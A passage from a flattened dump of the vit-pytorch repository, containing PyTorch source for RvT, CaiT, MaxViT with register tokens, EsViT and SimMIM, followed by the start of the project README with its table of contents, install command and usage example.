= DepthWiseConv2d(dim_in, dim_out, kernel, padding = kernel // 2, bias = False) self.cls_proj = nn.Linear(dim_in, dim_out) if dim_in != dim_out else nn.Identity() def forward(self, x, fmap_dims): cls_token, x = x[:, :1], x[:, 1:] x = rearrange(x, 'b (h w) d -> b d h w', **fmap_dims) x = self.conv(x) x = rearrange(x, 'b d h w -> b (h w) d') cls_token = self.cls_proj(cls_token) return torch.cat((cls_token, x), dim = 1) class GEGLU(nn.Module): def forward(self, x): x, gates = x.chunk(2, dim = -1) return F.gelu(gates) * x class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0., use_glu = True): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim * 2 if use_glu else hidden_dim), GEGLU() if use_glu else nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0., use_rotary = True, use_ds_conv = True, conv_query_kernel = 5): super().__init__() inner_dim = dim_head * heads self.use_rotary = use_rotary self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.use_ds_conv = use_ds_conv self.to_q = SpatialConv(dim, inner_dim, conv_query_kernel, bias = False) if use_ds_conv else nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, pos_emb, fmap_dims): b, n, _, h = *x.shape, self.heads to_q_kwargs = {'fmap_dims': fmap_dims} if self.use_ds_conv else {} x = self.norm(x) q = self.to_q(x, **to_q_kwargs) qkv = (q, *self.to_kv(x).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> (b h) n d', h = h), qkv) if self.use_rotary: # apply 2d rotary embeddings to queries and keys, excluding CLS tokens sin, cos = pos_emb dim_rotary = sin.shape[-1] (q_cls, q), (k_cls, k) = map(lambda t: (t[:, :1], t[:, 1:]), (q, k)) # handle the case where rotary dimension < head dimension 
(q, q_pass), (k, k_pass) = map(lambda t: (t[..., :dim_rotary], t[..., dim_rotary:]), (q, k)) q, k = map(lambda t: (t * cos) + (rotate_every_two(t) * sin), (q, k)) q, k = map(lambda t: torch.cat(t, dim = -1), ((q, q_pass), (k, k_pass))) # concat back the CLS tokens q = torch.cat((q_cls, q), dim = 1) k = torch.cat((k_cls, k), dim = 1) dots = einsum('b i d, b j d -> b i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b i j, b j d -> b i d', attn, v) out = rearrange(out, '(b h) n d -> b n (h d)', h = h) return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, image_size, dropout = 0., use_rotary = True, use_ds_conv = True, use_glu = True): super().__init__() self.layers = nn.ModuleList([]) self.pos_emb = AxialRotaryEmbedding(dim_head, max_freq = image_size) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout, use_rotary = use_rotary, use_ds_conv = use_ds_conv), FeedForward(dim, mlp_dim, dropout = dropout, use_glu = use_glu) ])) def forward(self, x, fmap_dims): pos_emb = self.pos_emb(x[:, 1:]) for attn, ff in self.layers: x = attn(x, pos_emb = pos_emb, fmap_dims = fmap_dims) + x x = ff(x) + x return x # Rotary Vision Transformer class RvT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., use_rotary = True, use_ds_conv = True, use_glu = True): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = channels * patch_size ** 2 self.patch_size = patch_size self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.Linear(patch_dim, dim), ) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, image_size, dropout, use_rotary, use_ds_conv, use_glu) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): b, _, h, w, p = *img.shape, self.patch_size x = self.to_patch_embedding(img) n = x.shape[1] cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) fmap_dims = {'h': h // p, 'w': w // p} x = self.transformer(x, fmap_dims = fmap_dims) return self.mlp_head(x[:, 0]) File: vit_pytorch/cait.py from random import randrange import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def dropout_layers(layers, dropout): if dropout == 0: return layers num_layers = len(layers) to_drop = torch.zeros(num_layers).uniform_(0., 1.) 
< dropout # make sure at least one layer makes it if all(to_drop): rand_index = randrange(num_layers) to_drop[rand_index] = False layers = [layer for (layer, drop) in zip(layers, to_drop) if not drop] return layers # classes class LayerScale(nn.Module): def __init__(self, dim, fn, depth): super().__init__() if depth <= 18: # epsilon detailed in section 2 of paper init_eps = 0.1 elif depth > 18 and depth <= 24: init_eps = 1e-5 else: init_eps = 1e-6 scale = torch.zeros(1, 1, dim).fill_(init_eps) self.scale = nn.Parameter(scale) self.fn = fn def forward(self, x, **kwargs): return self.fn(x, **kwargs) * self.scale class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.mix_heads_pre_attn = nn.Parameter(torch.randn(heads, heads)) self.mix_heads_post_attn = nn.Parameter(torch.randn(heads, heads)) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, context = None): b, n, _, h = *x.shape, self.heads x = self.norm(x) context = x if not exists(context) else torch.cat((x, context), dim = 1) qkv = (self.to_q(x), *self.to_kv(context).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale dots = einsum('b h i j, h g -> b g i j', dots, self.mix_heads_pre_attn) # talking heads, pre-softmax attn = self.attend(dots) attn = self.dropout(attn) attn = einsum('b h i j, h g -> b g i j', attn, self.mix_heads_post_attn) # talking heads, post-softmax out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0., layer_dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) self.layer_dropout = layer_dropout for ind in range(depth): self.layers.append(nn.ModuleList([ LayerScale(dim, Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), depth = ind + 1), LayerScale(dim, FeedForward(dim, mlp_dim, dropout = dropout), depth = ind + 1) ])) def forward(self, x, context = None): layers = dropout_layers(self.layers, dropout = self.layer_dropout) for attn, ff in layers: x = attn(x, context = context) + x x = ff(x) + x return x class CaiT(nn.Module): def __init__( self, *, image_size, patch_size, num_classes, dim, depth, cls_depth, heads, mlp_dim, dim_head = 64, dropout = 0., emb_dropout = 0., layer_dropout = 0. ): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' 
num_patches = (image_size // patch_size) ** 2 patch_dim = 3 * patch_size ** 2 self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.patch_transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout, layer_dropout) self.cls_transformer = Transformer(dim, cls_depth, heads, dim_head, mlp_dim, dropout, layer_dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape x += self.pos_embedding[:, :n] x = self.dropout(x) x = self.patch_transformer(x) cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = self.cls_transformer(cls_tokens, context = x) return self.mlp_head(x[:, 0]) File: vit_pytorch/max_vit_with_registers.py from functools import partial import torch from torch import nn, einsum import torch.nn.functional as F from torch.nn import Module, ModuleList, Sequential from einops import rearrange, repeat, reduce, pack, unpack from einops.layers.torch import Rearrange, Reduce # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pack_one(x, pattern): return pack([x], pattern) def unpack_one(x, ps, pattern): return unpack(x, ps, pattern)[0] def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) # helper classes def FeedForward(dim, mult = 4, dropout = 0.): inner_dim = int(dim * mult) return Sequential( nn.LayerNorm(dim), nn.Linear(dim, inner_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) # MBConv class SqueezeExcitation(Module): def __init__(self, dim, shrinkage_rate = 0.25): super().__init__() hidden_dim = int(dim * shrinkage_rate) self.gate = Sequential( Reduce('b c h w -> b c', 'mean'), nn.Linear(dim, hidden_dim, bias = False), nn.SiLU(), nn.Linear(hidden_dim, dim, bias = False), nn.Sigmoid(), Rearrange('b c -> b c 1 1') ) def forward(self, x): return x * self.gate(x) class MBConvResidual(Module): def __init__(self, fn, dropout = 0.): super().__init__() self.fn = fn self.dropsample = Dropsample(dropout) def forward(self, x): out = self.fn(x) out = self.dropsample(out) return out + x class Dropsample(Module): def __init__(self, prob = 0): super().__init__() self.prob = prob def forward(self, x): device = x.device if self.prob == 0. or (not self.training): return x keep_mask = torch.FloatTensor((x.shape[0], 1, 1, 1), device = device).uniform_() > self.prob return x * keep_mask / (1 - self.prob) def MBConv( dim_in, dim_out, *, downsample, expansion_rate = 4, shrinkage_rate = 0.25, dropout = 0. 
): hidden_dim = int(expansion_rate * dim_out) stride = 2 if downsample else 1 net = Sequential( nn.Conv2d(dim_in, hidden_dim, 1), nn.BatchNorm2d(hidden_dim), nn.GELU(), nn.Conv2d(hidden_dim, hidden_dim, 3, stride = stride, padding = 1, groups = hidden_dim), nn.BatchNorm2d(hidden_dim), nn.GELU(), SqueezeExcitation(hidden_dim, shrinkage_rate = shrinkage_rate), nn.Conv2d(hidden_dim, dim_out, 1), nn.BatchNorm2d(dim_out) ) if dim_in == dim_out and not downsample: net = MBConvResidual(net, dropout = dropout) return net # attention related classes class Attention(Module): def __init__( self, dim, dim_head = 32, dropout = 0., window_size = 7, num_registers = 1 ): super().__init__() assert num_registers > 0 assert (dim % dim_head) == 0, 'dimension should be divisible by dimension per head' self.heads = dim // dim_head self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.to_qkv = nn.Linear(dim, dim * 3, bias = False) self.attend = nn.Sequential( nn.Softmax(dim = -1), nn.Dropout(dropout) ) self.to_out = nn.Sequential( nn.Linear(dim, dim, bias = False), nn.Dropout(dropout) ) # relative positional bias num_rel_pos_bias = (2 * window_size - 1) ** 2 self.rel_pos_bias = nn.Embedding(num_rel_pos_bias + 1, self.heads) pos = torch.arange(window_size) grid = torch.stack(torch.meshgrid(pos, pos, indexing = 'ij')) grid = rearrange(grid, 'c i j -> (i j) c') rel_pos = rearrange(grid, 'i ... -> i 1 ...') - rearrange(grid, 'j ... -> 1 j ...') rel_pos += window_size - 1 rel_pos_indices = (rel_pos * torch.tensor([2 * window_size - 1, 1])).sum(dim = -1) rel_pos_indices = F.pad(rel_pos_indices, (num_registers, 0, num_registers, 0), value = num_rel_pos_bias) self.register_buffer('rel_pos_indices', rel_pos_indices, persistent = False) def forward(self, x): device, h, bias_indices = x.device, self.heads, self.rel_pos_indices x = self.norm(x) # project for queries, keys, values q, k, v = self.to_qkv(x).chunk(3, dim = -1) # split heads q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), (q, k, v)) # scale q = q * self.scale # sim sim = einsum('b h i d, b h j d -> b h i j', q, k) # add positional bias bias = self.rel_pos_bias(bias_indices) sim = sim + rearrange(bias, 'i j h -> h i j') # attention attn = self.attend(sim) # aggregate out = einsum('b h i j, b h j d -> b h i d', attn, v) # combine heads out out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class MaxViT(Module): def __init__( self, *, num_classes, dim, depth, dim_head = 32, dim_conv_stem = None, window_size = 7, mbconv_expansion_rate = 4, mbconv_shrinkage_rate = 0.25, dropout = 0.1, channels = 3, num_register_tokens = 4 ): super().__init__() assert isinstance(depth, tuple), 'depth needs to be tuple if integers indicating number of transformer blocks at that stage' assert num_register_tokens > 0 # convolutional stem dim_conv_stem = default(dim_conv_stem, dim) self.conv_stem = Sequential( nn.Conv2d(channels, dim_conv_stem, 3, stride = 2, padding = 1), nn.Conv2d(dim_conv_stem, dim_conv_stem, 3, padding = 1) ) # variables num_stages = len(depth) dims = tuple(map(lambda i: (2 ** i) * dim, range(num_stages))) dims = (dim_conv_stem, *dims) dim_pairs = tuple(zip(dims[:-1], dims[1:])) self.layers = nn.ModuleList([]) # window size self.window_size = window_size self.register_tokens = nn.ParameterList([]) # iterate through stages for ind, ((layer_dim_in, layer_dim), layer_depth) in enumerate(zip(dim_pairs, depth)): for stage_ind in range(layer_depth): is_first = stage_ind == 0 stage_dim_in = layer_dim_in if is_first else 
layer_dim conv = MBConv( stage_dim_in, layer_dim, downsample = is_first, expansion_rate = mbconv_expansion_rate, shrinkage_rate = mbconv_shrinkage_rate ) block_attn = Attention(dim = layer_dim, dim_head = dim_head, dropout = dropout, window_size = window_size, num_registers = num_register_tokens) block_ff = FeedForward(dim = layer_dim, dropout = dropout) grid_attn = Attention(dim = layer_dim, dim_head = dim_head, dropout = dropout, window_size = window_size, num_registers = num_register_tokens) grid_ff = FeedForward(dim = layer_dim, dropout = dropout) register_tokens = nn.Parameter(torch.randn(num_register_tokens, layer_dim)) self.layers.append(ModuleList([ conv, ModuleList([block_attn, block_ff]), ModuleList([grid_attn, grid_ff]) ])) self.register_tokens.append(register_tokens) # mlp head out self.mlp_head = nn.Sequential( Reduce('b d h w -> b d', 'mean'), nn.LayerNorm(dims[-1]), nn.Linear(dims[-1], num_classes) ) def forward(self, x): b, w = x.shape[0], self.window_size x = self.conv_stem(x) for (conv, (block_attn, block_ff), (grid_attn, grid_ff)), register_tokens in zip(self.layers, self.register_tokens): x = conv(x) # block-like attention x = rearrange(x, 'b d (x w1) (y w2) -> b x y w1 w2 d', w1 = w, w2 = w) # prepare register tokens r = repeat(register_tokens, 'n d -> b x y n d', b = b, x = x.shape[1],y = x.shape[2]) r, register_batch_ps = pack_one(r, '* n d') x, window_ps = pack_one(x, 'b x y * d') x, batch_ps = pack_one(x, '* n d') x, register_ps = pack([r, x], 'b * d') x = block_attn(x) + x x = block_ff(x) + x r, x = unpack(x, register_ps, 'b * d') x = unpack_one(x, batch_ps, '* n d') x = unpack_one(x, window_ps, 'b x y * d') x = rearrange(x, 'b x y w1 w2 d -> b d (x w1) (y w2)') r = unpack_one(r, register_batch_ps, '* n d') # grid-like attention x = rearrange(x, 'b d (w1 x) (w2 y) -> b x y w1 w2 d', w1 = w, w2 = w) # prepare register tokens r = reduce(r, 'b x y n d -> b n d', 'mean') r = repeat(r, 'b n d -> b x y n d', x = x.shape[1], y = x.shape[2]) r, register_batch_ps = pack_one(r, '* n d') x, window_ps = pack_one(x, 'b x y * d') x, batch_ps = pack_one(x, '* n d') x, register_ps = pack([r, x], 'b * d') x = grid_attn(x) + x r, x = unpack(x, register_ps, 'b * d') x = grid_ff(x) + x x = unpack_one(x, batch_ps, '* n d') x = unpack_one(x, window_ps, 'b x y * d') x = rearrange(x, 'b x y w1 w2 d -> b d (w1 x) (w2 y)') return self.mlp_head(x) File: vit_pytorch/es_vit.py import copy import random from functools import wraps, partial import torch from torch import nn, einsum import torch.nn.functional as F from torchvision import transforms as T from einops import rearrange, reduce, repeat # helper functions def exists(val): return val is not None def default(val, default): return val if exists(val) else default def singleton(cache_key): def inner_fn(fn): @wraps(fn) def wrapper(self, *args, **kwargs): instance = getattr(self, cache_key) if instance is not None: return instance instance = fn(self, *args, **kwargs) setattr(self, cache_key, instance) return instance return wrapper return inner_fn def get_module_device(module): return next(module.parameters()).device def set_requires_grad(model, val): for p in model.parameters(): p.requires_grad = val # tensor related helpers def log(t, eps = 1e-20): return torch.log(t + eps) # loss function # (algorithm 1 in the paper) def view_loss_fn( teacher_logits, student_logits, teacher_temp, student_temp, centers, eps = 1e-20 ): teacher_logits = teacher_logits.detach() student_probs = (student_logits / student_temp).softmax(dim = -1) teacher_probs = 
((teacher_logits - centers) / teacher_temp).softmax(dim = -1) return - (teacher_probs * log(student_probs, eps)).sum(dim = -1).mean() def region_loss_fn( teacher_logits, student_logits, teacher_latent, student_latent, teacher_temp, student_temp, centers, eps = 1e-20 ): teacher_logits = teacher_logits.detach() student_probs = (student_logits / student_temp).softmax(dim = -1) teacher_probs = ((teacher_logits - centers) / teacher_temp).softmax(dim = -1) sim_matrix = einsum('b i d, b j d -> b i j', student_latent, teacher_latent) sim_indices = sim_matrix.max(dim = -1).indices sim_indices = repeat(sim_indices, 'b n -> b n k', k = teacher_probs.shape[-1]) max_sim_teacher_probs = teacher_probs.gather(1, sim_indices) return - (max_sim_teacher_probs * log(student_probs, eps)).sum(dim = -1).mean() # augmentation utils class RandomApply(nn.Module): def __init__(self, fn, p): super().__init__() self.fn = fn self.p = p def forward(self, x): if random.random() > self.p: return x return self.fn(x) # exponential moving average class EMA(): def __init__(self, beta): super().__init__() self.beta = beta def update_average(self, old, new): if old is None: return new return old * self.beta + (1 - self.beta) * new def update_moving_average(ema_updater, ma_model, current_model): for current_params, ma_params in zip(current_model.parameters(), ma_model.parameters()): old_weight, up_weight = ma_params.data, current_params.data ma_params.data = ema_updater.update_average(old_weight, up_weight) # MLP class for projector and predictor class L2Norm(nn.Module): def forward(self, x, eps = 1e-6): return F.normalize(x, dim = 1, eps = eps) class MLP(nn.Module): def __init__(self, dim, dim_out, num_layers, hidden_size = 256): super().__init__() layers = [] dims = (dim, *((hidden_size,) * (num_layers - 1))) for ind, (layer_dim_in, layer_dim_out) in enumerate(zip(dims[:-1], dims[1:])): is_last = ind == (len(dims) - 1) layers.extend([ nn.Linear(layer_dim_in, layer_dim_out), nn.GELU() if not is_last else nn.Identity() ]) self.net = nn.Sequential( *layers, L2Norm(), nn.Linear(hidden_size, dim_out) ) def forward(self, x): return self.net(x) # a wrapper class for the base neural network # will manage the interception of the hidden layer output # and pipe it into the projecter and predictor nets class NetWrapper(nn.Module): def __init__(self, net, output_dim, projection_hidden_size, projection_num_layers, layer = -2): super().__init__() self.net = net self.layer = layer self.view_projector = None self.region_projector = None self.projection_hidden_size = projection_hidden_size self.projection_num_layers = projection_num_layers self.output_dim = output_dim self.hidden = {} self.hook_registered = False def _find_layer(self): if type(self.layer) == str: modules = dict([*self.net.named_modules()]) return modules.get(self.layer, None) elif type(self.layer) == int: children = [*self.net.children()] return children[self.layer] return None def _hook(self, _, input, output): device = input[0].device self.hidden[device] = output def _register_hook(self): layer = self._find_layer() assert layer is not None, f'hidden layer ({self.layer}) not found' handle = layer.register_forward_hook(self._hook) self.hook_registered = True @singleton('view_projector') def _get_view_projector(self, hidden): dim = hidden.shape[1] projector = MLP(dim, self.output_dim, self.projection_num_layers, self.projection_hidden_size) return projector.to(hidden) @singleton('region_projector') def _get_region_projector(self, hidden): dim = hidden.shape[1] projector = 
MLP(dim, self.output_dim, self.projection_num_layers, self.projection_hidden_size) return projector.to(hidden) def get_embedding(self, x): if self.layer == -1: return self.net(x) if not self.hook_registered: self._register_hook() self.hidden.clear() _ = self.net(x) hidden = self.hidden[x.device] self.hidden.clear() assert hidden is not None, f'hidden layer {self.layer} never emitted an output' return hidden def forward(self, x, return_projection = True): region_latents = self.get_embedding(x) global_latent = reduce(region_latents, 'b c h w -> b c', 'mean') if not return_projection: return global_latent, region_latents view_projector = self._get_view_projector(global_latent) region_projector = self._get_region_projector(region_latents) region_latents = rearrange(region_latents, 'b c h w -> b (h w) c') return view_projector(global_latent), region_projector(region_latents), region_latents # main class class EsViTTrainer(nn.Module): def __init__( self, net, image_size, hidden_layer = -2, projection_hidden_size = 256, num_classes_K = 65336, projection_layers = 4, student_temp = 0.9, teacher_temp = 0.04, local_upper_crop_scale = 0.4, global_lower_crop_scale = 0.5, moving_average_decay = 0.9, center_moving_average_decay = 0.9, augment_fn = None, augment_fn2 = None ): super().__init__() self.net = net # default BYOL augmentation DEFAULT_AUG = torch.nn.Sequential( RandomApply( T.ColorJitter(0.8, 0.8, 0.8, 0.2), p = 0.3 ), T.RandomGrayscale(p=0.2), T.RandomHorizontalFlip(), RandomApply( T.GaussianBlur((3, 3), (1.0, 2.0)), p = 0.2 ), T.Normalize( mean=torch.tensor([0.485, 0.456, 0.406]), std=torch.tensor([0.229, 0.224, 0.225])), ) self.augment1 = default(augment_fn, DEFAULT_AUG) self.augment2 = default(augment_fn2, DEFAULT_AUG) # local and global crops self.local_crop = T.RandomResizedCrop((image_size, image_size), scale = (0.05, local_upper_crop_scale)) self.global_crop = T.RandomResizedCrop((image_size, image_size), scale = (global_lower_crop_scale, 1.)) self.student_encoder = NetWrapper(net, num_classes_K, projection_hidden_size, projection_layers, layer = hidden_layer) self.teacher_encoder = None self.teacher_ema_updater = EMA(moving_average_decay) self.register_buffer('teacher_view_centers', torch.zeros(1, num_classes_K)) self.register_buffer('last_teacher_view_centers', torch.zeros(1, num_classes_K)) self.register_buffer('teacher_region_centers', torch.zeros(1, num_classes_K)) self.register_buffer('last_teacher_region_centers', torch.zeros(1, num_classes_K)) self.teacher_centering_ema_updater = EMA(center_moving_average_decay) self.student_temp = student_temp self.teacher_temp = teacher_temp # get device of network and make wrapper same device device = get_module_device(net) self.to(device) # send a mock image tensor to instantiate singleton parameters self.forward(torch.randn(2, 3, image_size, image_size, device=device)) @singleton('teacher_encoder') def _get_teacher_encoder(self): teacher_encoder = copy.deepcopy(self.student_encoder) set_requires_grad(teacher_encoder, False) return teacher_encoder def reset_moving_average(self): del self.teacher_encoder self.teacher_encoder = None def update_moving_average(self): assert self.teacher_encoder is not None, 'target encoder has not been created yet' update_moving_average(self.teacher_ema_updater, self.teacher_encoder, self.student_encoder) new_teacher_view_centers = self.teacher_centering_ema_updater.update_average(self.teacher_view_centers, self.last_teacher_view_centers) self.teacher_view_centers.copy_(new_teacher_view_centers) 
new_teacher_region_centers = self.teacher_centering_ema_updater.update_average(self.teacher_region_centers, self.last_teacher_region_centers) self.teacher_region_centers.copy_(new_teacher_region_centers) def forward( self, x, return_embedding = False, return_projection = True, student_temp = None, teacher_temp = None ): if return_embedding: return self.student_encoder(x, return_projection = return_projection) image_one, image_two = self.augment1(x), self.augment2(x) local_image_one, local_image_two = self.local_crop(image_one), self.local_crop(image_two) global_image_one, global_image_two = self.global_crop(image_one), self.global_crop(image_two) student_view_proj_one, student_region_proj_one, student_latent_one = self.student_encoder(local_image_one) student_view_proj_two, student_region_proj_two, student_latent_two = self.student_encoder(local_image_two) with torch.no_grad(): teacher_encoder = self._get_teacher_encoder() teacher_view_proj_one, teacher_region_proj_one, teacher_latent_one = teacher_encoder(global_image_one) teacher_view_proj_two, teacher_region_proj_two, teacher_latent_two = teacher_encoder(global_image_two) view_loss_fn_ = partial( view_loss_fn, student_temp = default(student_temp, self.student_temp), teacher_temp = default(teacher_temp, self.teacher_temp), centers = self.teacher_view_centers ) region_loss_fn_ = partial( region_loss_fn, student_temp = default(student_temp, self.student_temp), teacher_temp = default(teacher_temp, self.teacher_temp), centers = self.teacher_region_centers ) # calculate view-level loss teacher_view_logits_avg = torch.cat((teacher_view_proj_one, teacher_view_proj_two)).mean(dim = 0) self.last_teacher_view_centers.copy_(teacher_view_logits_avg) teacher_region_logits_avg = torch.cat((teacher_region_proj_one, teacher_region_proj_two)).mean(dim = (0, 1)) self.last_teacher_region_centers.copy_(teacher_region_logits_avg) view_loss = (view_loss_fn_(teacher_view_proj_one, student_view_proj_two) \ + view_loss_fn_(teacher_view_proj_two, student_view_proj_one)) / 2 # calculate region-level loss region_loss = (region_loss_fn_(teacher_region_proj_one, student_region_proj_two, teacher_latent_one, student_latent_two) \ + region_loss_fn_(teacher_region_proj_two, student_region_proj_one, teacher_latent_two, student_latent_one)) / 2 return (view_loss + region_loss) / 2 File: vit_pytorch/simmim.py import torch from torch import nn import torch.nn.functional as F from einops import repeat class SimMIM(nn.Module): def __init__( self, *, encoder, masking_ratio = 0.5 ): super().__init__() assert masking_ratio > 0 and masking_ratio < 1, 'masking ratio must be kept between 0 and 1' self.masking_ratio = masking_ratio # extract some hyperparameters and functions from encoder (vision transformer to be trained) self.encoder = encoder num_patches, encoder_dim = encoder.pos_embedding.shape[-2:] self.to_patch = encoder.to_patch_embedding[0] self.patch_to_emb = nn.Sequential(*encoder.to_patch_embedding[1:]) pixel_values_per_patch = encoder.to_patch_embedding[2].weight.shape[-1] # simple linear head self.mask_token = nn.Parameter(torch.randn(encoder_dim)) self.to_pixels = nn.Linear(encoder_dim, pixel_values_per_patch) def forward(self, img): device = img.device # get patches patches = self.to_patch(img) batch, num_patches, *_ = patches.shape # for indexing purposes batch_range = torch.arange(batch, device = device)[:, None] # get positions pos_emb = self.encoder.pos_embedding[:, 1:(num_patches + 1)] # patch to encoder tokens and add positions tokens = 
self.patch_to_emb(patches) tokens = tokens + pos_emb # prepare mask tokens mask_tokens = repeat(self.mask_token, 'd -> b n d', b = batch, n = num_patches) mask_tokens = mask_tokens + pos_emb # calculate of patches needed to be masked, and get positions (indices) to be masked num_masked = int(self.masking_ratio * num_patches) masked_indices = torch.rand(batch, num_patches, device = device).topk(k = num_masked, dim = -1).indices masked_bool_mask = torch.zeros((batch, num_patches), device = device).scatter_(-1, masked_indices, 1).bool() # mask tokens tokens = torch.where(masked_bool_mask[..., None], mask_tokens, tokens) # attend with vision transformer encoded = self.encoder.transformer(tokens) # get the masked tokens encoded_mask_tokens = encoded[batch_range, masked_indices] # small linear projection for predicted pixel values pred_pixel_values = self.to_pixels(encoded_mask_tokens) # get the masked patches for the final reconstruction loss masked_patches = patches[batch_range, masked_indices] # calculate reconstruction loss recon_loss = F.l1_loss(pred_pixel_values, masked_patches) / num_masked return recon_loss
<img src="./images/vit.gif" width="500px"></img> ## Table of Contents - [Vision Transformer - Pytorch](#vision-transformer---pytorch) - [Install](#install) - [Usage](#usage) - [Parameters](#parameters) - [Simple ViT](#simple-vit) - [NaViT](#navit) - [Distillation](#distillation) - [Deep ViT](#deep-vit) - [CaiT](#cait) - [Token-to-Token ViT](#token-to-token-vit) - [CCT](#cct) - [Cross ViT](#cross-vit) - [PiT](#pit) - [LeViT](#levit) - [CvT](#cvt) - [Twins SVT](#twins-svt) - [CrossFormer](#crossformer) - [RegionViT](#regionvit) - [ScalableViT](#scalablevit) - [SepViT](#sepvit) - [MaxViT](#maxvit) - [NesT](#nest) - [MobileViT](#mobilevit) - [XCiT](#xcit) - [Masked Autoencoder](#masked-autoencoder) - [Simple Masked Image Modeling](#simple-masked-image-modeling) - [Masked Patch Prediction](#masked-patch-prediction) - [Masked Position Prediction](#masked-position-prediction) - [Adaptive Token Sampling](#adaptive-token-sampling) - [Patch Merger](#patch-merger) - [Vision Transformer for Small Datasets](#vision-transformer-for-small-datasets) - [3D Vit](#3d-vit) - [ViVit](#vivit) - [Parallel ViT](#parallel-vit) - [Learnable Memory ViT](#learnable-memory-vit) - [Dino](#dino) - [EsViT](#esvit) - [Accessing Attention](#accessing-attention) - [Research Ideas](#research-ideas) * [Efficient Attention](#efficient-attention) * [Combining with other Transformer improvements](#combining-with-other-transformer-improvements) - [FAQ](#faq) - [Resources](#resources) - [Citations](#citations) ## Vision Transformer - Pytorch Implementation of <a href="https://openreview.net/pdf?id=YicbFdNTTy">Vision Transformer</a>, a simple way to achieve SOTA in vision classification with only a single transformer encoder, in Pytorch. Significance is further explained in <a href="https://www.youtube.com/watch?v=TrdevFK_am4">Yannic Kilcher's</a> video. There's really not much to code here, but may as well lay it out for everyone so we expedite the attention revolution. For a Pytorch implementation with pretrained models, please see Ross Wightman's repository <a href="https://github.com/rwightman/pytorch-image-models">here</a>. The official Jax repository is <a href="https://github.com/google-research/vision_transformer">here</a>. A tensorflow2 translation also exists <a href="https://github.com/taki0112/vit-tensorflow">here</a>, created by research scientist <a href="https://github.com/taki0112">Junho Kim</a>! 🙏 <a href="https://github.com/conceptofmind/vit-flax">Flax translation</a> by <a href="https://github.com/conceptofmind">Enrico Shippole</a>! ## Install ```bash $ pip install vit-pytorch ``` ## Usage ```python import torch from vit_pytorch import ViT v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 